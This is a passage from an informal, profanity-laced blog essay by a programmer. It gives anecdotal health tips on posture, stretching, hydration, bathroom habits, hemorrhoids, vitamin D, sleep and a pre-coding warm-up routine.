Instead of doing some extreme thing like turning out all the lights in your office, just have good lighting and use a color scheme that fits the type of LCD you have and the room’s lighting. It’s the combination of room/area lighting, LCD brightness, LCD quality, fonts, and your color scheme that will make you feel better.

But most importantly, just take a break.

Back Problems

I’ve been extremely lucky to have a good solid back most of my life. Even though I’ve been sitting in a chair for a good portion of that life, I still have a good flexible and strong back.

For me, the problem is in my upper back, neck, and shoulders. I tend to hunch over the keyboard and have to force myself to sit up straight. In fact right when I started typing this section I noticed I wasn’t sitting up straight and had to correct it.

Now, the choice of chair matters, and I tend to like either Aeron chairs or some kind of solid small stool or bench. I’m currently very much liking my little $40 piano bench I used to sit on to practice piano. It doesn’t have a back so it forces me to sit up straight more often and engage my core muscles (stomach and back muscles).

For my shoulders though it’s entirely stress. I tend to “scrunch up” my shoulders when I’m focused intensely and that causes my whole upper back to hurt, sending pain all the way up my neck and head. It gets really bad if I practice guitar for long periods at a time.

What I’ve found helps the most is stretching your upper arms and doing push-ups. Stretching your upper arms is as simple as grabbing a door jamb and pulling each arm or both arms in a different direction. Try these if you’re feeling stiff:

  1. Grab a door jamb with one arm so your palm faces the front of your body, then pull your shoulder out so you stretch your chest and the front of your shoulder.
  2. Grab the door jamb with one arm so that your arm crosses your body, and again with your palm facing the front (kind of backwards), then pull so your shoulder at the back is stretched.
  3. Put both arms on the door jamb in front of you, right above your head, and stand away from it a bit so that you lean down and pull your arms above you and back.

If you do that, and also rotate your shoulders and shake your body out you’ll start to feel much better. Maybe combine this with your wrist stretches before you work each day.

Another big help is doing some push-ups. I wouldn’t do these at work or before you work because it will make you tired and make it hard to work. I’d instead just do 10 a night before you go to sleep. Just 10 will do a lot for your chest, back, wrists, and neck. Don’t do them very fast, but do them slowly and focus on balancing your body when you do them.

Dehydration

This one is simple, and I’m guilty of it quite frequently. I find I drink a ton of coffee, and because of that I have to make sure I drink some water too. If I don’t I get headaches and really don’t feel right. The problem with dehydration is it’s hard for you to tell you’re suffering from it until it’s too late.

What I suggest, and what I’ve started doing more, is that you drink a bottle or cup of water with every non-water beverage you drink. I also recommend you ditch the sodas. They’re just full of nasty fake sugar that makes you fat and causes diabetes, and they’re not rehydrating you. If you gotta drink something then plain black coffee is pretty damn good, but again drink some water with it.

Bowel And Urinary Problems

Alright the next two are kinda gross so I won’t go into what happened to me, but I’ll say this:

Go to the fucking bathroom right when you have to go. Don’t wait.

You wouldn’t believe how useful this advice is and I really wish I’d been told it when I was younger. Because I would code non-stop like a “real programmer” I would skip bathroom breaks and hold it in for far too long. The problem is with bowel movements your body just stops telling you to crap, and then it builds up.

This eventually leads to constipation and it’s a motherfucker on your health. For your urinary tract it causes problems that are less important, but you can get infections and other nice little surprises.

If you’ve already screwed up, the best thing to do is go get some fiber tablets and take them then stay home ’cause it’s gonna get ugly.

Then, when you feel you need to go, just get up and go for the love of god. I’m telling you, your brilliant idea will come more naturally after you poop.

Hemorrhoids and Prostate Health

The other problem you have from not using the restroom when you should is that you get hemorrhoids. Yeah yeah, I know, really gross and I promise this is the only time I’m gonna mention them ever. But, many programmers have them and are ashamed to talk about them or even know what causes them so I’m going to lay it out for you. I’ve actually done all of these but only had them once or twice:

  1. Sitting for a long period of time.
  2. Lifting heavy weights without proper equipment.
  3. Not taking a dump when you actually need to.
  4. Forcing a dump when you don’t need to.
  5. The worst one though: Sitting on the toilet reading.

This last one is the killer let me tell you. If you don’t have to go, then do not sit on the can hanging out. What this does is put all the weight of your body and bowels on your already probably screwed up rectum and then pushes it out. Nasty. That also then causes hemorrhoids because the pressure increases in your blood vessels unnaturally.

These are just freaking gross, but they’re also potentially harmful. Yes, you can get some that are so bad you bleed all over the place. If you have some, please go see your doctor and deal with it. You may need surgery, so just do it. I didn’t but man it was close. One year I was lifting weights, working in a warehouse, coding non-stop, and not using the bathroom.

Yep, I was an idiot, so don’t make the same mistake. Make sure you do these three things to keep your ass healthy:

  1. Eat some veggies regularly, or eat some fiber tablets at least.
  2. Go to the bathroom right when you have to go.
  3. Don’t force pressure down there in any way.

This can also damage your prostate if you aren’t careful, but usually that’s from sitting on your ass all day. Just get up and walk around or take breaks and you’ll fix that problem. If you find blood in your urine or you have problems peeing, go see a doctor because it might be more serious. If you pee a lot it can also be bad, so again see a doctor.

Vitamin D Deficiency

Vitamin D is weird. You really only get it from the Sun but you don’t need much direct sunlight to get it. Maybe like 5-30 minutes depending on how strong it is. It’s also tied to your calcium levels, and a lack of phosphate, but if you eat regularly and something other than potato chips that shouldn’t be a big problem.

Some of the things you can get are depression, screwed up teeth, pain in weird places like in the bones in your arms, cramping muscles, and just generally feeling like crap. If you’re really bad you might need to get a prescription from a doctor, but usually you can just make a plan to go outside for 30 minutes when the Sun is high in the sky.

In fact, I think this is one of the problems with catered food at many startups here in the Valley. Since you are inclined to stay in the office and eat food and constant leftovers, and because many offices have poor lighting, you tend to not go outside when the Sun is out. Combine that with poor sleeping habits and you can really be screwing up your vitamin D levels without knowing it.

Just something as simple as not eating the catered lunches and walking outside at noon to get your food could help more than you know. Anyway the food is better.

I got minor vitamin D deficiency when I lived in Vancouver and Seattle. Up there you just don’t have sunshine for months on end, and for me that was a killer. Some people can handle it, but for someone like me who lived on a tropical island in his teens, this was just murder.

So, if you have sunshine, get out and grab some when you can.

Sleeping Disorders

I’ve always had a flexible sleep schedule, usually depending on the season and the region. In some areas I trend toward a night owl persona and stay up really late doing things then sleeping in. Since moving to SF I’ve been getting up earlier and not staying up as late, and I’ve actually been feeling really good lately.

Sometimes though, and I’m not sure why, I feel way more productive in both music and coding late at night, or very early in the morning. I think it’s because I’m still in a tired state and so my brain is relaxed. I also think it’s because it’s very quiet and I can just hang out and think with no distractions.

Either way, this need to either get up very early or stay up very late sort of screws with my sleep schedule. I find that I much prefer getting up early as I get older. I feel more awake and rested during the day. If I stay up late and sleep in I feel like I have a hangover and I can get headaches.

If you have problems sleeping though, I have a very simple kind of meditation that I’ve been using for years to crash, and it can help you too. It takes a bit of practice, but it totally works and works quickly.

First up, if you can, get the best damn bed you can afford. 2000+ dollars is nothing for a great bed. I spent at least 2200 on a sweet Tempur-Pedic. It’s totally worth it.

Now with your awesome bed here’s how you start practicing getting to sleep easily. It’s kind of a self-hypnosis trick:

  1. Make sure that you’ve killed all sounds and lights that might be in your room.
  2. Lie on your back and put your hands on your body somewhere comfortable, or at your sides.
  3. Start breathing in deeply and slowly and breathing out. As you do this, imagine you can see the air flow in and out of your body.
  4. Once you start to see your breath, imagine that you’re looking through a window and outside the window is a large huge open space with stars in it.
  5. As you breathe, feel yourself float through the window and slowly out into the massive expanse of stars, all floating softly around you.
  6. Keep this going and then just let this floating spread into your bed and out around you until there is nothing.

You probably will crash out at around step 4 or 5, but if not just hang out and keep letting yourself float and melt until you do.

If you have severe insomnia then definitely talk to a doctor about it, but try this out, as well as exercising like crazy for about an hour or two a day. Exercise will definitely make you sleep.

Stiffness And Flexibility

If you constantly feel “stiff” or unable to move well, then you probably need to stretch regularly. Really the best thing you can do is go to yoga about once a week, and then try to do the exercises on your own. If you can’t do that, then go get any number of books on basic stretching from the library or from a book store. You really just need a simple book on the subject, and you don’t need to do too many.

I think if you did about 5-6 big stretching exercises a night before sleeping you’d feel very relaxed and see a major improvement in your general health and feeling.

Relaxing your body through stretching relaxes your mind as well, so a great way to improve your creativity and boost your ideas is to do yoga or stretching for about 30 minutes, then take your morning shower. Combine this with some meditation and you’ll start to see a major improvement in your general ability to mentally adapt and start to see yourself make odd connections you wouldn’t have before.

I’m not sure why this is, but a relaxed mind is crucial to spontaneous creativity and idea generation.

A Simple First Step

This is probably a lot of information for one person, and I seriously hope that you don’t have all of these problems. What I recommend though if you don’t have these issues is that you try to avoid them. If you’re just starting out then you need to maybe adopt a simple “coding warm-up” routine you can go through before you code.

Here’s what I do before I sit down to code, or before I play guitar, and whenever I get stiff and need a break:

  1. Rotate all the joints in your body by just moving your wrists, arms, neck, back, and hips in a few little circles. Say 5 one direction, then 5 in another direction.
  2. Do a small number of the wrist exercises and shake your wrists between each set.
  3. Stretch your arms above your head as high as you can, and then stretch them back as far as you can, and then pull them across the front of your body.
  4. Finally, carefully use your hand to pull your head to the right, left, forward, and back a bit.

If you just did this you would avoid quite a few programming injuries. Since programming isn’t really that physically taxing it’s fairly easy to avoid hurting yourself, so this is really all you need.

However, if you have a specific problem, then again consult a physician and try some of my advice if they say it’s alright. Nothing I’m proposing here is radical or weird, just basic exercises and common sense, so it should be alright with any doctor. I just don’t want to get sued so remember I told you to ask one first.

Hopefully that helps you out, and if not just remember the advice in case you run into these. If you’re lucky they won’t be a problem but I think every programmer I know has had something like this at least once.

If you have other problems along these lines, then feel free to email me and I’ll reply with some advice.

Take care.
